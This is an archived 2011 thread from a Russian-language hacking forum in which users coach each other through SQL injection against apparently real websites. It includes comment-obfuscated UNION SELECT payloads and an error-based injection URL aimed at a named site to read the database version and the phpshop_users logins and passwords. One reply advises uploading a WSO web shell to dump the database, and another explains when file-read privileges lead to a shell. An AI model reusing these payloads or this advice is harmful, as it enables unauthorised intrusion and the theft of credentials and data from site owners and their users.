ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.06.2011, 14:56
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от alexvrn
alexvrn said:
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите
Покажи линк - быстрее помогут )
|
|
|
22.06.2011, 14:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от alexvrn
alexvrn said:
-3'/**//*!union*//**//*!select*//**/4--'
показывает страницу с id 4 как вывести версию базы и т.д помогите
Ну по всей видимости вывод попадает в заголовок Location, и очевидней будет сделать так
Код:
Code:
-3'/**//*!union*//**//*!select*//**/version()--'
|
|
|
|
22.06.2011, 15:10
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
|
|
|
|
22.06.2011, 15:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
вроде и так все понятно что коннект с БД только с локалки + удаленный коннект запрещен... порт то 3306 просканил хоть перед коннектом ?
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
22.06.2011, 15:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от GroM88
GroM88 said:
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
Потому что localhost. Тебе нужно цепляться к мускулу как по локалке. Выход - шелл.
Хочешь сдампить бд или просто подрубиться - залей шелл типа wso и сдампи бд через настройки ЦМС.
Быстрее и удобнее будет.
|
|
|
|
22.06.2011, 15:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от GroM88
GroM88 said:
Такой вопрос, прочитал через скуль конфиг цмс
dbhost = localhost
dbuser = lalala
dbname = lalal2
dbpass = password
pma на хосте нет, пытаюсь с локалхоста через свой пхпмуадмин подключится
пишу в конфиге phpmyadmin'a
host site.ru
pass lalala,
db и т.п.
пишет (2003) нет конекта к серверу
Вопрос почему? если в конфиге написано сервер дб = localhost
Ну или как можно узнать какой ип у ДБ = \
Порт вроде стандартный, в php.ini смотрел = \
Вероятность то что mysql открыт для доступа из вне (а если и открыт, то чаще всего для определенного хоста) слишком мала. Как вариант можно проверить пароли к фтп или ссш.
И если ты смог прочитать файлы через MySQL инъекцию, значит у тебя file_priv = on, а если в добавок к тому, ты вызвал load_file('/путь/файл') без кодировки (типа hex) то у тебя и magic_quotes_gpc = off, это значит что если ты найдешь полный путь до веб каталога для которого хватит прав на запись, то шелл считай у тебя есть.
|
|
|
|
22.06.2011, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от alexvrn
alexvrn said:
кто поможет мне ))
Код:
Code:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_categories)group/**/by(concat(version(),0x00,floor(rand(0)*2))))and(if(mid(version(),1,1)=5,1,0))='1.html
|
|
|
|
22.06.2011, 15:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от alexvrn
alexvrn said:
как взять phpshop_users
/thread43966.html
|
|
|
|
22.06.2011, 15:51
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от BigBear
BigBear said:
Где ещё помимо мускула может лежать пасс от админки ?
в файле, в скрипте прописан, в мускуле, но в другой таблице/базе нопремер
__________________
|
|
|
|
22.06.2011, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от alexvrn
alexvrn said:
http://all-black-lists.com/cat/catalog-4'and(select(max(1))from(phpshop_users)group/**/by(concat(0x3a,login,password,floor(rand(0)*2))))a nd(if(mid(0x3a,login,password,1,1)=5,1,0))='1.html
чёт не работает помогите
Сначала прочитай то, что я тебе дал, а потом если возникнут вопросы, задавай их здесь, но только по существу, а не какой то набор буквосимволов что я процитировал.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
